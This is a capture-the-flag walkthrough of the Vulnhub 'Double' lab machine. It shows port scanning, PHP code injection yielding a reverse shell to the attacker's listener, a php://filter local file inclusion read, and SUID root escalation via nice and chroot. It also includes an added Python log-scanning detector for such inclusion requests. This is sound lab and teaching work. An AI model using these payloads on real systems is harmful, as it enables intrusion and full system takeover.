Vulnhub Double Walkthrough – Writeup

Double is an easy machine from Vulnhub by foxlox. I tested the machine in VirtualBox. Here, I won’t be explaining simple steps like listing files, viewing a file, editing a file, etc.

Link to the machine: https://www.vulnhub.com/entry/double-1,632/


Identify the target

As usual, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

My IP address is 10.0.2.15 and that of the target is 10.0.2.61.

Scan open ports

Next, I scanned the open ports on the target machine. Doing so will give us an idea of the exposed services on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.61

Enumerate web server

First, I checked the web server.

The default page contained two links. Here, the TEST link redirects to port 8080. Likewise, the Production link gave me the following page.

Looking at the inputs, it asks for a command and a code. So, I used an arbitrary code (9001) and a valid Linux command, ‘id’.

However, it didn’t give me any command execution. But we see some results here. For example, we now have a new GET parameter “out”. Similarly, we see the date and time, and the IP address of my machine. So, we can guess that some variables have been used. Therefore, I tried executing some PHP code.

The screenshot above confirmed that we can execute PHP commands. So, I used the following payload inside the PHP syntax to get the reverse shell. Before this, I listened on port 9001 for the reverse shell.

nc -nlvp 9001

$sock=fsockopen("10.0.2.15",9001);exec("bash <&3 >&3 2>&3");

Finally, I got the shell. Next, I improved the shell using the following link.

Upgrade to an intelligent reverse shell

Bonus: Local File Inclusion

As I told you earlier, there is a new GET parameter “out”. Interestingly, the parameter allowed local file inclusion.

So, we can check the techniques from the following reference.

https://book.hacktricks.xyz/pentesting-web/file-inclusion

Only the technique to read the source code worked. This is because the user www-data didn’t have access to do log poisoning. Similarly, some plugins aren’t enabled.

php://filter/convert.base64-encode/resource=sendcommand.php

After decoding the code, we see that the command isn’t validated and we could execute remote commands as we did earlier.
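
From the defender's side, requests like the one above stand out in the web server's access log. The following Python sketch is an added example, not part of the original writeup: it flags query parameters such as "out" whose decoded value starts with a PHP stream wrapper or contains directory traversal, which goes slightly beyond the single php://filter case shown here. The log lines, the /app.php path and the timestamps are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Stream wrappers that should never appear in a file-name parameter.
WRAPPER = re.compile(r"^(php|data|expect|zip|phar|file|glob)://", re.I)
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Combined Log Format: client ident user [time] "METHOD target PROTO" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; /app.php and the timestamps are assumptions.
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2021:10:00:00 +0000] "GET /app.php?out=report.txt HTTP/1.1" 200 512',
    '10.0.2.15 - - [01/Jan/2021:10:00:05 +0000] "GET /app.php?out=php://filter/'
    'convert.base64-encode/resource=sendcommand.php HTTP/1.1" 200 2048',
    '10.0.2.15 - - [01/Jan/2021:10:00:09 +0000] "GET /app.php?out=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return (client, param, reason, value) findings for one log line."""
    m = LINE.match(line)
    if not m:
        return []
    client, target = m.group(1), m.group(3)
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw).strip()
        if WRAPPER.match(value):
            findings.append((client, name, "stream-wrapper", value))
        elif TRAVERSAL.search(value):
            findings.append((client, name, "path-traversal", value))
    return findings

def scan(lines):
    """Collect findings across all log lines, in order."""
    return [f for line in lines for f in inspect_line(line)]

if __name__ == "__main__":
    for client, name, reason, value in scan(SAMPLE_LOG):
        print(f"{client} param={name} {reason}: {value}")
```
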

Privilege Escalation

Finally, it was time to escalate privileges. There were two users, ppp and fox. However, I couldn’t find any way to escalate to either of the users. Interestingly, when I looked at the SUID binaries, there were two binaries that could give me root access.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

Using nice: https://gtfobins.github.io/gtfobins/nice/#suid

nice bash -p

Using chroot: https://gtfobins.github.io/gtfobins/chroot/#suid

chroot / bash -p

I guess this explains the name of the machine. Lastly, I got both flags.
